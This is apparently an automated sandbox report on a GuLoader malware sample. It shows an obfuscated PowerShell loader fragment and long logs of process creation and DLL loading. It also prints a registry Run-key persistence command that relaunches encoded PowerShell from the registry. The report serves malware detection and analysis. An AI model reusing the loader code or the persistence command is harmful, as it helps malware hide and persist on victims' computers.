mtSemisMonr.T.att Ch xs,nstDisp ,fsk-FuglV La,aTipslSkaruLa,se Bo lr t$ uscSMisac HydhR.kei looz KigoRep.pLderhAcicaDisrsAppeiAggra,rro;Ge e ');Xerotherm (Handig ' S,pi Chef ,or Labr(AaletFacoe TorsDub tindk- StrpMalaaHeavtTi.eh,ndi H neT Li.:sp l\DemoKAbsooRekorMenisA.foeUnsctUn es.eta.UnibtBentx Adet A.s)Kvin{eksae Pasx,oeci RentEqua} Fer;trop ');$Wedeln = Handig 'NonmedemycBedeh iewoFor edan%kon.al,plpFarmpMakedAra aWoodtBisuaRaft% Gen\Ma,ePRikslTilleSpaau oodrFun.oSenstForbhC.mpoLys,t Tito Ca nUnblu Ma,sAmer.ImprDDistiDi,il Las Gara&Post&Staf C,loeF.tocGennhFangoChi, Tor$Over ';Xerotherm (Handig 'tore$ mangOthilTriloUnstbTr,na.aval ove:paabSOpt.w EngeDir.eLus pAntryT pe=Gaze(S ecc StrmPnhedUdda Fejl/,avlcPr t Utl$,agsWTrine,ilbd DydeFly.lTy.inKar.)Plat ');Xerotherm (Handig 'Pr s$BriegStral ,odoNo,ib ,ndaIntelSu.e:FacoD CleeDo.ab PriaNarktbeeftKonte VaraBramtUds.rCam eIc.nn StoeUtths Reu=Tall$PlamFAn.no F rrStradc.iboDisgmNstemIns,eKlarsCali.Pr bsdetepKr,vlReaciSangt Urf(Gill$TeisP Sk.rE spoPrombB tol DomeCuttmT,lda.allnRhamaJordlopryyPicksWo keArtsrBox.n PrleA,etsAfsp)Slad ');$Fordommes=$Debatteatrenes[0];Xerotherm (Handig ' era$Leucg irklSpeeoF.nabEncaaBal,lCent:B atUStj.rOplaeAmphtGeore f arSouroBagggfor.r ephaLoc.pA sehBars=AlfaN redeKaglwBlyg- accO AntbForlj BoneUgudcAntetDiff LogaSPulvyKonfs A btBilleN,dumMikr.AtomNSysteHetetM.ni.,andWMarke.ussb Si.CS lvlPh.ni P,ceNondnQuintOpsp ');Xerotherm (Handig 'Spin$,jouUBehjrAnt,eTro,tAfstebrikrI.dsoArbegSupprAdgaaReflp Ambh Ec..ToplHJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Pleurothotonus.Dil && echo $"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1888,i,9343559299430913976,12874712062366799984,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2024 --field-trial-handle=1968,i,3232856823138323663,3674453500036115141,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)"Jump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: slc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2306982846.0000000007A69000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000005.00000002.2275976188.00000000035BE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2306982846.0000000007B15000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000005.00000002.2306982846.0000000007ABE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: em.Core.pdbpX) source: powershell.exe, 00000005.00000002.2306982846.0000000007B45000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb'$ source: powershell.exe, 00000005.00000002.2306982846.0000000007ABE000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Yara detected GuLoader
              Source: Yara matchFile source: 00000005.00000002.2310523296.0000000009685000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2310422489.0000000008E60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2304485459.0000000006292000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2497877400.00000210BCD05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
